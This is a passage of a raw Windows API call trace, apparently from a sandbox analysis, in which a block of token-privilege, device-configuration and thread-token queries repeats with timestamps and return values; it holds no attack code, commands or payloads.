0xffffffff [0016.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.864] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.864] SetLastError (dwErrCode=0x522) [0016.864] CloseHandle (hObject=0x114) returned 1 [0016.864] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.864] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.864] GetLastError () returned 0x578 [0016.864] SetLastError (dwErrCode=0x578) [0016.864] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.864] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.864] GetCurrentThread () returned 0xfffffffe [0016.864] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.864] GetLastError () returned 0x3f0 [0016.864] GetCurrentProcess () returned 0xffffffff [0016.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.864] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.864] SetLastError (dwErrCode=0x522) [0016.864] CloseHandle (hObject=0x114) returned 1 [0016.864] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.864] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.864] GetLastError () returned 0x578 [0016.864] SetLastError (dwErrCode=0x578) [0016.864] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.865] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.865] GetCurrentThread () returned 0xfffffffe [0016.865] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.865] GetLastError () returned 0x3f0 [0016.865] GetCurrentProcess () returned 0xffffffff [0016.865] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.865] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.865] SetLastError (dwErrCode=0x522) [0016.865] CloseHandle (hObject=0x114) returned 1 [0016.865] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.865] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.865] GetLastError () returned 0x578 [0016.865] SetLastError (dwErrCode=0x578) [0016.865] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.865] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.865] GetCurrentThread () returned 0xfffffffe [0016.865] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.865] GetLastError () returned 0x3f0 [0016.865] GetCurrentProcess () returned 0xffffffff [0016.865] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.865] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.865] SetLastError (dwErrCode=0x522) [0016.865] CloseHandle (hObject=0x114) returned 1 [0016.865] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.865] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.865] GetLastError () returned 0x578 [0016.866] SetLastError (dwErrCode=0x578) [0016.866] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.866] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.866] GetCurrentThread () returned 0xfffffffe [0016.866] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.866] GetLastError () returned 0x3f0 [0016.866] GetCurrentProcess () returned 0xffffffff [0016.866] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.866] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.866] SetLastError (dwErrCode=0x522) [0016.866] CloseHandle (hObject=0x114) returned 1 [0016.866] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.866] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.866] GetLastError () returned 0x578 [0016.866] SetLastError (dwErrCode=0x578) [0016.866] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.866] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.866] GetCurrentThread () returned 0xfffffffe [0016.866] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.866] GetLastError () returned 0x3f0 [0016.866] GetCurrentProcess () returned 0xffffffff [0016.866] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.866] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.866] SetLastError (dwErrCode=0x522) [0016.866] CloseHandle (hObject=0x114) returned 1 [0016.867] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.867] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.867] GetLastError () returned 0x578 [0016.867] SetLastError (dwErrCode=0x578) [0016.867] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.867] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.867] GetCurrentThread () returned 0xfffffffe [0016.867] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.867] GetLastError () returned 0x3f0 [0016.867] GetCurrentProcess () returned 0xffffffff [0016.867] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.867] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.867] SetLastError (dwErrCode=0x522) [0016.867] CloseHandle (hObject=0x114) returned 1 [0016.867] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.867] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.867] GetLastError () returned 0x578 [0016.867] SetLastError (dwErrCode=0x578) [0016.867] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.867] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.867] GetCurrentThread () returned 0xfffffffe [0016.867] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.867] GetLastError () returned 0x3f0 [0016.867] GetCurrentProcess () returned 0xffffffff [0016.867] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.868] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.868] SetLastError (dwErrCode=0x522) [0016.868] CloseHandle (hObject=0x114) returned 1 [0016.868] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.868] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.868] GetLastError () returned 0x578 [0016.868] SetLastError (dwErrCode=0x578) [0016.868] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.868] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.868] GetCurrentThread () returned 0xfffffffe [0016.868] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.868] GetLastError () returned 0x3f0 [0016.868] GetCurrentProcess () returned 0xffffffff [0016.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.868] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.868] SetLastError (dwErrCode=0x522) [0016.868] CloseHandle (hObject=0x114) returned 1 [0016.868] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.868] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.868] GetLastError () returned 0x578 [0016.868] SetLastError (dwErrCode=0x578) [0016.868] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.868] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.868] GetCurrentThread () returned 0xfffffffe [0016.868] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.869] GetLastError () returned 0x3f0 [0016.869] GetCurrentProcess () returned 0xffffffff [0016.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.869] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.869] SetLastError (dwErrCode=0x522) [0016.869] CloseHandle (hObject=0x114) returned 1 [0016.869] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.869] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.869] GetLastError () returned 0x578 [0016.869] SetLastError (dwErrCode=0x578) [0016.869] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.869] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.869] GetCurrentThread () returned 0xfffffffe [0016.869] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.869] GetLastError () returned 0x3f0 [0016.869] GetCurrentProcess () returned 0xffffffff [0016.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.869] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.869] SetLastError (dwErrCode=0x522) [0016.869] CloseHandle (hObject=0x114) returned 1 [0016.869] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.869] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.869] GetLastError () returned 0x578 [0016.869] SetLastError (dwErrCode=0x578) [0016.869] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.870] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.870] GetCurrentThread () returned 0xfffffffe [0016.870] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.870] GetLastError () returned 0x3f0 [0016.870] GetCurrentProcess () returned 0xffffffff [0016.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.870] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.870] SetLastError (dwErrCode=0x522) [0016.870] CloseHandle (hObject=0x114) returned 1 [0016.870] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.870] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.870] GetLastError () returned 0x578 [0016.870] SetLastError (dwErrCode=0x578) [0016.870] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.870] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.870] GetCurrentThread () returned 0xfffffffe [0016.870] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.870] GetLastError () returned 0x3f0 [0016.870] GetCurrentProcess () returned 0xffffffff [0016.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.870] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.870] SetLastError (dwErrCode=0x522) [0016.870] CloseHandle (hObject=0x114) returned 1 [0016.870] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.870] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.871] GetLastError () returned 0x578 [0016.871] SetLastError (dwErrCode=0x578) [0016.871] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.871] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.871] GetCurrentThread () returned 0xfffffffe [0016.871] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.871] GetLastError () returned 0x3f0 [0016.871] GetCurrentProcess () returned 0xffffffff [0016.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.871] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.871] SetLastError (dwErrCode=0x522) [0016.871] CloseHandle (hObject=0x114) returned 1 [0016.871] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.871] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.871] GetLastError () returned 0x578 [0016.871] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.871] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.871] GetCurrentThread () returned 0xfffffffe [0016.871] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.871] GetLastError () returned 0x3f0 [0016.871] GetCurrentProcess () returned 0xffffffff [0016.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.871] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.872] SetLastError (dwErrCode=0x522) [0016.872] CloseHandle (hObject=0x114) returned 1 [0016.872] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.872] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.872] GetLastError () returned 0x578 [0016.872] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.872] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.872] GetCurrentThread () returned 0xfffffffe [0016.872] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.872] GetLastError () returned 0x3f0 [0016.872] GetCurrentProcess () returned 0xffffffff [0016.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.872] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.872] SetLastError (dwErrCode=0x522) [0016.872] CloseHandle (hObject=0x114) returned 1 [0016.872] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.872] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.872] GetLastError () returned 0x578 [0016.872] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.872] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.872] GetCurrentThread () returned 0xfffffffe [0016.872] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.872] GetLastError () returned 0x3f0 [0016.872] GetCurrentProcess () returned 0xffffffff [0016.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.873] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.873] SetLastError (dwErrCode=0x522) [0016.873] CloseHandle (hObject=0x114) returned 1 [0016.873] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.873] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.873] GetLastError () returned 0x578 [0016.873] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.873] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.873] GetCurrentThread () returned 0xfffffffe [0016.873] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.873] GetLastError () returned 0x3f0 [0016.873] GetCurrentProcess () returned 0xffffffff [0016.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.873] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.873] SetLastError (dwErrCode=0x522) [0016.873] CloseHandle (hObject=0x114) returned 1 [0016.873] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.873] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.873] GetLastError () returned 0x578 [0016.873] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.873] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.873] GetCurrentThread () returned 0xfffffffe [0016.873] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.873] GetLastError () returned 0x3f0 [0016.873] GetCurrentProcess () returned 0xffffffff [0016.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.874] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.874] SetLastError (dwErrCode=0x522) [0016.874] CloseHandle (hObject=0x114) returned 1 [0016.874] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.874] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.874] GetLastError () returned 0x578 [0016.874] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.874] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.874] GetCurrentThread () returned 0xfffffffe [0016.874] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.874] GetLastError () returned 0x3f0 [0016.874] GetCurrentProcess () returned 0xffffffff [0016.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.874] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.874] SetLastError (dwErrCode=0x522) [0016.874] CloseHandle (hObject=0x114) returned 1 [0016.874] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.874] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.874] GetLastError () returned 0x578 [0016.874] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.874] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.874] GetCurrentThread () returned 0xfffffffe [0016.874] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.874] GetLastError () returned 0x3f0 [0016.874] GetCurrentProcess () returned 0xffffffff [0016.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.874] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.875] SetLastError (dwErrCode=0x522) [0016.875] CloseHandle (hObject=0x114) returned 1 [0016.875] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.875] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.875] GetLastError () returned 0x578 [0016.875] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.875] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.875] GetCurrentThread () returned 0xfffffffe [0016.875] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.875] GetLastError () returned 0x3f0 [0016.875] GetCurrentProcess () returned 0xffffffff [0016.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.875] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.875] SetLastError (dwErrCode=0x522) [0016.875] CloseHandle (hObject=0x114) returned 1 [0016.875] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.875] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, 